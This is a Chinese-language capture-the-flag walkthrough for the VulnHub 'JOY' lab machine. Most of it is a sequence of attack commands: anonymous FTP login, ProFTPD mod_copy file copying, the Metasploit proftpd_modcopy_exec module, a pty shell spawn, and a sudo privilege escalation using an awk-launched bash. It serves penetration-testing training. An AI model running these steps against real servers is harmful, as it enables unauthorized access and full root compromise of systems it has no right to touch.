前期準備
鏡像下載
https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
環境配置:
在VM以net連接打開虛擬機
使用的機器:
攻擊機:kali linux,ubuntu
靶機:ip隨配(192.168.119.137)
滲透開始
1.nmap發現主機,並掃描其ip信息
nmap -A 192.168.119.137
2.發現ftp相關的知識,嘗試登陸ftp
ftp 192.168.119.137
賬號:anonymous
密碼:空
ls
cd download
ls
cd ..
cd upload
ls
get directory
退出ftp
cat directory
由於version_control存在於patrick路徑中,我們是沒有權限去獲取的,所以嘗試將其轉移到/upload路徑中
telnet 192.168.119.137 21
site cpfr /home/patrick/version_control
site cpto /home/upload/version_control
3.下載相關文件,發現版本漏洞
訪問路徑 ftp://192.168.119.137/upload/version_control
直接下載一個文件,打開
由上 proftpd的版本是存在漏洞的,並且告訴了webroot路徑,可以使用msf裏面的腳本攻擊
4.使用msf獲得shell,並嘗試提權
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.119.137
set sitepath /var/www/tryingharderisjoy
python -c 'import pty; pty.spawn("/bin/bash")'
ls
cd ossec
ls
cat patricksecretsofjoy
發現賬戶以及密碼
5.得到另一個賬號,嘗試提權
切換賬戶登陸
su -l patrick
6.將提權的腳本寫入對應的路徑中
可以看到在路徑 /home//patrick/script/test 是免密的
那我們可以嘗試上傳腳本文件到此路徑中
本地主機編寫腳本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上傳到upload
cd upload
put test
在使用telnet轉換一下路徑
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
7.提權
sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt